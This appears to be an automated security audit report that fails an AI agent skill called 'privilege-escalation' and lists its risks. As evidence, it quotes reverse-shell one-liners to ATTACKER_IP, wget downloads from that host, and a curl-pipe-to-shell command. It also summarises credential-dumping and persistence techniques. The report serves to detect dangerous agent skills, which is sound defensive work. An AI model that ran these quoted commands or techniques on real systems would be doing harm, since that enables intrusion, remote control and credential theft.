privilege-escalation
Fail
Audited by Gen Agent Trust Hub on Apr 11, 2026
Risk Level: HIGHREMOTE_CODE_EXECUTIONEXTERNAL_DOWNLOADSDATA_EXFILTRATIONCOMMAND_EXECUTION
Full Analysis
- [REMOTE_CODE_EXECUTION]: The skill contains multiple patterns for establishing reverse shells to external IP addresses.
- Evidence includes shell one-liners for Bash, Python, and Netcat:
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1andnc -e /bin/bash ATTACKER_IP 4444found inreferences/linux-privesc.md. - Instructions for creating and executing malicious payloads via
msfvenomandJuicyPotatoinreferences/windows-privesc.md. - [EXTERNAL_DOWNLOADS]: Several files instruct the agent to download and execute scripts directly from the internet.
- The file
references/linux-privesc.mdincludes a piped execution command:curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh. - Instructions to download exploit source code from untrusted/attacker-controlled IPs:
wget http://ATTACKER_IP/exploit.candwget http://ATTACKER_IP:8000/linpeas.sh. - [DATA_EXFILTRATION]: The skill provides methods for accessing and extracting sensitive credentials and system data.
- Instructions for reading protected files like
/etc/shadowand Active Directory'sNTDS.ditdatabase (e.g.,vssadmin create shadow /for=C:). - Techniques for dumping credentials from memory using Mimikatz and harvesting cloud identity tokens from metadata services (SSRF) at
169.254.169.254. - [COMMAND_EXECUTION]: Extensive documentation on exploiting system misconfigurations for privilege escalation.
- Detailed guides on abusing SUID/GUID binaries, Sudo permissions (GTFOBins), Windows Token Impersonation (Potato attacks), and misconfigured IAM policies in AWS/Azure/GCP.
- Commands for modifying system state to maintain access, such as creating backdoor service principals in Azure or adding users to
/etc/passwd.
Recommendations
- AI detected serious security threats
Audit Metadata